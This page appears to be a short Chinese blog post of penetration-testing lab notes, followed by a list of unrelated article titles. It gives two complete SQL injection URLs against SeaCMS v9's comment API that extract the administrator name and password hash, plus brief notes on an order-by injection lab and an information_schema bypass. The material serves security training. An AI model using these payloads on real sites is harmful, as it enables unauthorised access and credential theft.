当前位置: 首页 > news >正文

渗透测试实验

news 2025/7/5 9:51:43

1、seacmsv9注入管理员密码

获取管理员账号(name)

http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`

 

2、获取管理员密码

 http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`

 

2、SQLilabs第46关 

 

使用?sort=1/2其排序不同,可以得知使用了orderby语句,存在漏洞。使用python脚本获取数据。

3、information_schema的绕过

使用join的子查询

http://www.dtcms.com/a/38241.html

相关文章:

  • 使用DeepSeek/ChatGPT等AI工具辅助编写wireshark过滤器
  • 实体机器人在gazebo中的映射
  • MagicArticulate: 超48K海量数据革新3D动画,自回归Transformer驱动关节智能生成!
  • Java 大视界 -- 基于 Java 的大数据机器学习模型压缩与部署优化(99)
  • Flink 中的滚动策略(Rolling Policy)
  • 通过命令启动steam的游戏
  • 软件项目开发中,产品经理借助 AI 工具将产品设计转化为需求的方法
  • echart版本^5.4.2,brush区域选择(框选),实现自定义按钮调取框选工具
  • 【第三天】零基础学习量化基础代码分析-持续更新
  • 基于Python和Django框架的食堂外卖系统设计与开发~源码
  • 论文阅读笔记:Deep Face Recognition: A Survey
  • 面试八股文--并发编程篇
  • skytower靶机详细教学
  • 第9章:LangChain结构化输出-示例5(基于大模型如何精确匹配POJO的字段)
  • Spring Security功能概述和相关介绍
  • IP------PPP协议
  • 利用 Vue 3 + Vite + Element UI Plus 结合 Service Worker 实现版本管理
  • pandas读取数据
  • 高并发微服务日志管理:ELK、Loki、Fluentd 终极对决与实战指南
  • 矩阵的 正定(Positive Definite)与负定(Negative Definite):从Fisher信息矩阵看“曲率”的秘密
  • Java所有运算符理解
  • SOME/IP-SD -- 协议英文原文讲解5
  • 线代[8]|北大丘维声教授《怎样学习线性代数?》(红色字体为博主本人注释)
  • Chrome 浏览器(版本号49之后)‌解决跨域问题
  • Hi3516CV610开发板ISP调试之——图像ISP在线调试 环境搭建教程
  • 《白帽子讲Web安全》学习:深入解析Cookie与会话安全
  • 银河麒麟高级服务器操作系统在线调整/pro/{PID}/limits文件中nofile的软限制和硬限制参数值操作方法
  • 设计模式-结构性模式
  • QARepVGG--含demo实现
  • 手写系列——MoE网络